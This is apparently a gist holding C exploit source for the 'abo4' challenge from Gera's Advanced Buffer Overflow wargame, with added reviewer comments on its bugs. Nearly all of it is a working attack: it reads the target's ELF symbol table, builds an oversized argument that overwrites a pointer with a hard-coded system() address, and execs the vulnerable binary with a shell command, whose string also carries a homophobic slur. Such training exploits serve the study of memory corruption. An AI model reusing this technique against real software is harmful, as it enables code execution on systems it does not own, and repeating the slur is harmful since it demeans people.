@gagomes
Created January 5, 2018 02:11
A no-brute-force exploit against abo4 from the "Advanced Buffer Overflow" collection by Gera, written circa 2002–2003
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <errno.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/mman.h>
#include <elf.h>
#include <link.h>
#include <assert.h>
#define ABO "abo4"
#if !defined(__linux__) || !defined(__i386__)
#error @#$%!
#endif
/*
 * Print `size` bytes of `data` to stdout as two-digit hex, space separated,
 * framed by "--begin dump--" and "--end dump--" lines.  The original kept a
 * column counter that advanced by three per byte and broke the line when it
 * was a non-zero multiple of 26; since 3 and 26 are coprime that is exactly
 * a line break before the bytes at index 26, 52, 78, ...
 */
void hexdump(unsigned char *data, int size)
{
printf("--begin dump--\n");
for (int idx = 0; idx < size; idx++) {
int col = 3 * idx;
if (col != 0 && col % 26 == 0)
putchar('\n');
printf("%02x ", data[idx]);
}
printf("\n--end dump--\n");
}
/*
 * Entry point.  Maps the file named by ABO read-only, walks its ELF section
 * headers to the symbol table, picks the first symbol whose name starts with
 * "fn", and then execs the target with three argv strings built from that
 * symbol's address and a hard-coded system_addr.  Only an i386/Linux build
 * is accepted (see the #if guard above), and the hard-coded address is
 * presumably tied to the author's libc layout of the time, so this is a
 * historical artefact rather than something expected to run on a current
 * system.
 *
 * Returns 0 only if execve() returns, i.e. if it failed.  On setup errors
 * the return value is whatever printf() returned (a byte count): non-zero,
 * but neither an errno value nor a conventional exit status.  argc/argv are
 * unused.
 */
int main(int argc, char **argv)
{
unsigned char *elf;       // start of the read-only mapping of the target file
char *symstr;             // string table that the symbol table section links to
Elf32_Ehdr *ehdr;
Elf32_Shdr *shdr, *sec;   // both end up pointing at the section header table
Elf32_Sym *sym;
int nsym;                 // number of Elf32_Sym entries in the symbol table
struct stat st;
int fd, n, i;
fd = open(ABO, O_RDONLY);
if (fd < 0)
return printf("open: %s\n", strerror(errno));
n = fstat(fd, &st);
if (n < 0)
return printf("fstat: %s\n", strerror(errno));
elf = mmap(0, st.st_size, PROT_READ, MAP_SHARED, fd, 0);
// NOTE(review): this tests ehdr, which has not been assigned yet (it is set
// from elf two lines down).  The value mmap() returned is in elf, so a
// failed mapping is not caught here, and reading ehdr uninitialised is UB.
if (ehdr == MAP_FAILED)
return printf("mmap: %s\n", strerror(errno));
ehdr = (Elf32_Ehdr *) &elf[0];
shdr = (Elf32_Shdr *) &elf[ehdr->e_shoff];
// Scan the section headers for the symbol table.  Nothing about the file
// (ELF magic, file size vs. e_shoff/e_shnum) is validated before the
// headers are trusted; tolerable only because the input is a local binary
// the author controls.
for (i = 0; i < ehdr->e_shnum; i++)
if (shdr[i].sh_type == SHT_SYMTAB)
break;
// NOTE(review): when nothing matched, i == e_shnum and this reads one
// entry past the end of the section header table before reporting.
if (shdr[i].sh_type != SHT_SYMTAB)
return printf("unable to find teh symbol table\n");
sec = (Elf32_Shdr *) &elf[ehdr->e_shoff];   // same table as shdr
sym = (Elf32_Sym *) &elf[shdr[i].sh_offset];
// For a SHT_SYMTAB section, sh_link is the index of its string table.
symstr = (char *) &elf[sec[shdr[i].sh_link].sh_offset];
nsym = shdr[i].sh_size / sizeof(Elf32_Sym);
// First symbol whose name begins with "fn" -- a two-byte prefix match, so
// any longer name starting with "fn" also satisfies it.  i is reused; on a
// miss the assert below indexes sym[nsym], one past the table, and aborts.
for (i = 0; i < nsym; i++)
if (!memcmp(&symstr[sym[i].st_name], "fn", 2))
break;
assert(!memcmp(&symstr[sym[i].st_name], "fn", 2));
{
unsigned int poke_addr = sym[i].st_value;    // address of the matched symbol in the target
unsigned int system_addr = 0x4006b974;       // hard-coded; presumably the author's libc, not resolved at run time
Elf32_Sym *ref = NULL;                       // unused: leftover from the commented-out lookup below
char argv1[261];
char argv2[5];
char argv3[] = "echo s33k is gay \\;\\]\n";
char *e_argv[5];
extern struct link_map *_dl_loaded;          // glibc-internal symbol; declared but never used here
struct link_map *lmap;                       // unused
printf("%p\n", (void *)&system);             // this process's own system() address, printed for comparison only
// lmap = _dl_lookup_symbol("system", _dl_loaded, &ref,
// _dl_loaded->l_scope, 0, 0);
memset(argv1, 0x0, sizeof argv1);
memset(argv2, 0x0, sizeof argv2);
// Fill argv1 with 260 'A' bytes, leaving the final NUL from memset in place
// (int vs. size_t comparison, harmless at this size).
for (i = 0; i < sizeof(argv1) - 1; i++)
argv1[i] = 0x41;
printf("poke_addr = 0x%08x\n", poke_addr);
printf("system = 0x%08x\n", system_addr);
// i is 260 after the loop; stepping back by 5 makes the four pre-increments
// below land on indices 256..259, the last four bytes before the NUL.
i -= 5;
argv1[++i] = (poke_addr >> 0x00) & 0xff;   // little-endian byte order
argv1[++i] = (poke_addr >> 0x08) & 0xff;
argv1[++i] = (poke_addr >> 0x10) & 0xff;
argv1[++i] = (poke_addr >> 0x18) & 0xff;
//hexdump(&argv1[0], sizeof argv1);
// argv2 is system_addr as four little-endian bytes; argv2[4] stays NUL.
argv2[0] = (system_addr >> 0x00) & 0xff;
argv2[1] = (system_addr >> 0x08) & 0xff;
argv2[2] = (system_addr >> 0x10) & 0xff;
argv2[3] = (system_addr >> 0x18) & 0xff;
//hexdump(&argv2[0], sizeof argv2);
e_argv[0] = ABO;
e_argv[1] = &argv1[0];
e_argv[2] = &argv2[0];
e_argv[3] = &argv3[0];
e_argv[4] = NULL;
printf("executing...\n");
// NOTE(review): the path is the literal "./abo4" while the file was opened
// as ABO; the two agree only while ABO stays "abo4".  execve()'s return is
// not checked, and fd / the mapping are never released (moot on success,
// since the image is replaced).
execve("./abo4", e_argv, NULL);
}
return 0;
}